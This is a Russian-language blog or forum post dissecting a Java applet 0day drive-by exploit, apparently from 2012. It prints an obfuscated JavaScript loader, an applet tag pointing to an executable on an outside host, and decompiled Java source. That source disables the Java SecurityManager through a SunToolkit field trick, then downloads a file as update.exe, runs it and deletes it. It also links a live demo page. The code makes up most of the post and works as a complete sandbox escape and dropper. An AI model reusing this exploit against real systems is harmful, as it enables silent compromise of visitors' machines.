Java 0day Стало интересно как работает, и вот: Для начала рассмотрим интересный кусок кода JavaScript защищенный обфускацией /*Encrypt By Dadong's JSXX 0.44 */ for(OUBbzls1=0,EXwldo6=true,PAhnWW4=["msie","firefox","opera"];EXwldo6;OUBbzls1++){EXwldo6=EXwldo6 && (navigator.userAgent.toLowerCase().indexOf(PAhnWW4[OUBbzls1])>-1);if(OUBbzls1==PAhnWW4.length-1)OUBbzls1=-1;}wbCQBK2="0";delete wbCQBK2;try{wbCQBK2+="0"+"0";}catch(e){NcFjn7 = eval;ldKXNGU1=unescape;}vlWWlBt3="11C6D1A508C9F33957FE826723E180764A9F855832E1FA2718C5857A1AC49216AA86EB17B688EB1BB295D859E6A98B57BAB38258F2A79814F9A09C4DFBB4DE39DFA29A3486A0873299FC306ED9897F64DD933B6AD79E706FDB98727E90855275B0B54271A88C076CA5B0426BAB787241A16B1D0DED1F3341BC361554A662721E8B7021519E6D2F10CD4B3E558B0A6767DB0E3D64DB032E45F04D6F239D4F6235624A3D75622B63633C6427455A005A4D486E407E4173547F40390C79447B467A1634726609530F1204390B1E0C5D121F0D58721F0213020F69147B02781D090A7515457B631725316B507D223B1F3F7E3A1B31686B29726C66793E3A26783A32263C40627F3D057A436F4C255E6F4C73476B5E4C582E43455E675C15163155584E6A7B1F11712E1A23437B0C68482848654734253A476D232F5A6E66614E6E6B36067F317E5F7E227E237A632924752A6E2B737B79730335576F5E79517D4260406157774D635E435F7C41010A284B4B4A79520E527D2E577D532E163245274F2D156F192F436F253C516C3F67567C3B6F1F33727A5D636163607B657F21246A65686B6D7639442D3E7712201A25172456675F7D472A5F41436B08677D567C08407751595F2761175D68200672137B403E5E35120D453F2438582D276C53743B2308373C69486E3D2C50726F757F7674772E727C7D6A696F703B462F0027466654684E6E06624E6C0B320F0D7F527D637740050811653224597030574D2A3C3B4E4024593D452A50380276303944606E20086B38381A2475073667617C60726B7C20786C6F75796379394C7570240B775067486C43434179476F5F540629574B566B1E010D1B37485579345D5B70311A204D2D4168473D4C2F44350326476F202855682660576F352101025A7A5F6122772D796275223B37382E706D6923467C542E446441655F7F6D644A734962470A1771475658714F0D112332245B732D56214469412D403F52750A7D0B7A0E3A4F5A576A2866556D646E5D642962482C223C7523262949136F7926796D7E6240627D384C62473F0B79567641795E245B415C2C0E29387556465277590259752555033C264227107909745E35443204162F204A75322E516B29774529770530683F625A72663E31727255326F7871286A7A7966016A4961487B456B476C0A240D76587843181F3F584D1A755A180C36514B48332E5725542E58230B2353664D375B6E053A4F5A576A2866556D64755D790F7E4863696C3561613A667B6634643F7B75354E6567395F7C4B7A4079496B4C73467C130915033F435D7C5D4952384E494E5B35444C7727413647611A354F6F1068493E2E2942622D7957653D755F29653337053763507763746C646360076F7E6A237D7B682B0B304273053A06331F220A21141326685C41457D5248403A59455C61114F4C6C265C24632F5F2840635D27462B5F28053A4F5A4D084C3939032E6354683A6F1C62427A0565322949136C732478787F6C4A797504172F2F084D7D4A6359790A675473444C7F6205293422527351494E7F61716D4F216474194432224321593E4F7118166D6C144A023C450E526E206D4E6A7079465D435616733E2F4B116E7D267A7A796E67794E69132D290E4F7F446D5B7B0C4A6544557A54150F19314E5D745A5A593C0A43167329037F29415E2D442A4A290C74361346347D0F3E6D2F6A5D792B2A7869444206463C2949136C732478787F6C45596A1E4E23190F237C436A48684F2A474C79595966462102253C7258405F6E24105C5F2C7903652D007D2B47582F4634342B0E4D274658697F3F3B01286D566A24691E7940613A4267517E2007122E7A62793A46324C646C4E6A437E2B1305257A4960565655304563426E7E7C702904233678265E2554221621613E4B7C13423428496D27245525246B626D2E727D39750736756562256161320A574C5F7D26011028447C7B24403464646F7742767B2811073B444B62505057324B447744051737102555527B315162511B521F481C7079115C4A2A4B6F21745727034D644F7C333705346952767675627A454C27533E2347156A7922466645205074675569511A33221448695F47447517636C63574E572E04233678265E25542216146523541F7F7B05412665273C557123227B5C086442613D3B071C0A6A25796166213961750D55792D772C1A7A35497156670968506A7B2F11073B444B625050573270715554081737102555527B31516274214A0054340D71275B242B4266306512443A707E493F3A01025A685B7F67642737605B207F5B28711204782B4F775465076C727448281305257A4960565655307B6A46516D120315354A597026462500224636452A0B7325455A29406436351075026D646839360300447E4E687B4D2F796877276D4F773A7F6D7D290939252D467556614130432F56612700";sBtEp6="function kikT2(){meSjBJF7=Math.PI;sRjYnQL3=Math.tan;ASQdP6=parseInt;XXCoPJ0='length';FfFodpV4='test';eEuq4='replace';uxNAFTd8=ASQdP6(~((~meSjBJF7&~meSjBJF7)|((meSjBJF7&meSjBJF7)|(~meSjBJF7&meSjBJF7)&(meSjBJF7&~meSjBJF7))));Dkni4=ASQdP6(((uxNAFTd8&uxNAFTd8)|(~uxNAFTd8&uxNAFTd8)&(uxNAFTd8&~uxNAFTd8)|(~uxNAFTd8&~uxNAFTd8))&1);/*Encrypt By Dadong's JSXX 0.44 VIP*/FVfejc3=Dkni4<>>7)+sBtEp6.charCodeAt(dItNk7);rlAR8+=Dkni4;IqVSn5>>>=0;for(dItNk7=uxNAFTd8,rEvzEVH1=Dkni4;dItNk7=(1<<3)){mCXaH4=dItNk7%(1<<3);}else {mCXaH4=dItNk7;}KIRD0=ASQdP6('0x'+IqVSn5.toString(Dkni4<<4).substr(mCXaH4,2))+rEvzEVH1;if(\/^(\\d{4})\/g[FfFodpV4](KIRD0+744))KIRD0%=82;utCv1+=DxDLFS8(ASQdP6(uxNAFTd8+ldKXNGU1('x')+vlWWlBt3.charAt(dItNk7)+vlWWlBt3.charAt(dItNk7+ASQdP6(Dkni4)))^KIRD0);}try{new function(){bAiMAGd8(utCv1);}}catch(e){try{new function(){biVddtE4=parseInt;sRjYnQL3(utCv1);}}catch(e) {window.location='.';}}}try{NcFjn7('kikT2();')}catch(e) {try{rlAR8=uxNAFTd8;NcFjn7('kikT2();');}catch(e){alert('ern');}}";jBqxUaE8 = NcFjn7(NcFjn7);jBqxUaE8(sBtEp6); Все прелестно, парочка Alert'ов дает нам результат: Далее идет забавный кусок HTML кода: body
body /body applet width="256" height="256" archive="applet.jar" code="cve2012xxxx.Gondvv.class" xiaomaolv="http://eas7.ru/hack/notepad.exe" bn="woyouyizhixiaomaolv" si="conglaiyebuqi" bs="748" /body Внутри applet.jar два файла, которые отлично конвертируюся в исходный код (JAD'ом): Gondvv.class: package cve2012xxxx; import java.applet.Applet; import java.awt.Graphics; import java.beans.Expression; import java.beans.Statement; import java.lang.reflect.Field; import java.net.URL; import java.security.*; import java.security.cert.Certificate; // Referenced classes of package cve2012xxxx: // Gondzz public class Gondvv extends Applet { public Gondvv() { } public void disableSecurity() throws Throwable { Statement localStatement = new Statement(java/lang/System, "setSecurityManager", new Object[1]); Permissions localPermissions = new Permissions(); localPermissions.add(new AllPermission()); ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions); AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] { localProtectionDomain }); SetField(java/beans/Statement, "acc", localStatement, localAccessControlContext); localStatement.execute(); } private Class GetClass(String paramString) throws Throwable { Object arrayOfObject[] = new Object[1]; arrayOfObject[0] = paramString; Expression localExpression = new Expression(java/lang/Class, "forName", arrayOfObject); localExpression.execute(); return (Class)localExpression.getValue(); } private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2) throws Throwable { Object arrayOfObject[] = new Object[2]; arrayOfObject[0] = paramClass; arrayOfObject[1] = paramString; Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject); localExpression.execute(); ((Field)localExpression.getValue()).set(paramObject1, paramObject2); } public void init() { try { disableSecurity(); String s1 = getParameter("bn"); String s = getParameter("xiaomaolv"); String s2 = getParameter("si"); String s3 = getParameter("bs"); String str1 = System.getProperty("os.name"); if(str1.indexOf("Windows") >= 0) Gondzz.xrun(s, s1, s2, Integer.valueOf(s3)); } catch(Throwable localThrowable) { localThrowable.printStackTrace(); } } public void paint(Graphics paramGraphics) { paramGraphics.drawString("Loading", 50, 25); } } Gondzz.class package cve2012xxxx; import java.io.*; import java.net.URL; import java.net.URLConnection; public class Gondzz { public Gondzz() { } public static Object xrun(String xiaomaolv, String bn, String si, Integer bs) throws Exception { if(xiaomaolv == null && bn == null) return null; try { String k1 = "woyouyizhixiaomaol"; String k2 = "conglaiyebuqi"; String str1 = System.getProperty("os.name"); if(bn.indexOf(k1) == 0 && si.indexOf(k2) == 0 && bs.intValue() == 748) { Object localObject1 = (new StringBuilder(String.valueOf(System.getProperty("java.io.tmpdir")))).append(File.separator).append("update.exe").toString(); downFile((String)localObject1, xiaomaolv); if(str1.indexOf("Windows") < 0) exec((new StringBuilder("chmod 755 ")).append((String)localObject1).toString()); exec((String)localObject1); (new File((String)localObject1)).delete(); } } catch(Exception exception) { } return null; } public static Process exec(String paramString) { Process localProcess = null; try { localProcess = Runtime.getRuntime().exec(paramString); if(localProcess != null); localProcess.waitFor(); } catch(Exception exception) { } return localProcess; } public static void downFile(String paramString1, String paramString2) { try { FileOutputStream localFileOutputStream = new FileOutputStream(paramString1); URL localURL = new URL(paramString2); String connayi = "xx"; URLConnection localURLConnection = localURL.openConnection(); int i = localURLConnection.getContentLength(); InputStream localInputStream = localURLConnection.getInputStream(); BufferedInputStream localBufferedInputStream = new BufferedInputStream(localInputStream); byte arrayOfByte[] = new byte[i]; int j = 0; for(int k = 0; k < i; k += j) { j = localBufferedInputStream.read(arrayOfByte, k, arrayOfByte.length - k); if(j == -1) break; } localBufferedInputStream.close(); localFileOutputStream.write(arrayOfByte); localFileOutputStream.close(); } catch(Exception exception) { } } } Вот собственно и весь exploit, патчей пока нет, всем рекомендуется отключить Java:))) Проверила на себя, предварительно проверив чистоту кода, кому интересно развлечся можну тут: http://eas7.ru/hack/java.html - запустится notepad блокнот.